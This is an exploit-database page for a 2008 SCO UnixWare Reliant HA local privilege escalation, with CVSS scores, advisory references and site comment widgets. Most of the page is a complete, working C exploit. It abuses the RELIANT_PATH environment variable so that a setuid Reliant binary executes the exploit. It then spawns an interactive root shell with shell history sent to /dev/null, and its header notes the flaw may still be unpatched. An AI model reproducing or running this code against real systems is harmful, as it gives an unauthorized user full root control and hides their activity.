SCO UnixWare Reliant HA Local Root Exploit

2009.04.01
Credit: qaaz
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-20


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

/* 04/2008: public release * I have'nt seen any advisory on this; possibly still not fixed. * * SCO UnixWare Reliant HA Local Root Exploit * By qaaz */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <errno.h> #include <fcntl.h> #define TGT1 "/usr/opt/reliant/bin/hvdisp" #define TGT2 "/usr/opt/reliant/bin/rcvm" #define DIR "bin" #define BIN DIR "/hvenv" int main(int argc, char *argv[]) { char self[4096], *target; pid_t child; if (geteuid() == 0) { setuid(geteuid()); dup2(3, 0); dup2(4, 1); dup2(5, 2); if ((child = fork()) == 0) { putenv("HISTFILE=/dev/null"); execl("/bin/sh", "sh", "-i", NULL); printf("[-] sh: %s\n", strerror(errno)); } else if (child != -1) waitpid(child, NULL, 0); kill(getppid(), 15); return 1; } printf("----------------------------------------\n"); printf(" UnixWare Reliant HA Local Root Exploit\n"); printf(" By qaaz\n"); printf("----------------------------------------\n"); if (access(TGT1, EX_OK) == 0) target = TGT1; else if (access(TGT2, EX_OK) == 0) target = TGT2; else { printf("[-] No targets found\n"); return 1; } sprintf(self, "/proc/%d/object/a.out", getpid()); if (mkdir(DIR, 0777) < 0 && errno != EEXIST) { printf("[-] %s: %s\n", DIR, strerror(errno)); return 1; } if (symlink(self, BIN) < 0) { printf("[-] %s: %s\n", BIN, strerror(errno)); rmdir(DIR); return 1; } if ((child = fork()) == 0) { char path[4096] = "RELIANT_PATH="; dup2(0, 3); dup2(1, 4); dup2(2, 5); putenv(strcat(path, getcwd(NULL, sizeof(path)-14))); execl(target, target, NULL); printf("[-] %s: %s\n", target, strerror(errno)); return 1; } else if (child != -1) waitpid(child, NULL, 0); unlink(BIN); rmdir(DIR); return 0; }

References:

ftp://ftp.sco.com/pub/unixware7/714/security/p534850/p534850.txt
http://www.securityfocus.com/bid/28624
http://www.milw0rm.com/exploits/5356
http://secunia.com/advisories/30921
http://osvdb.org/46707
http://osvdb.org/46706


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top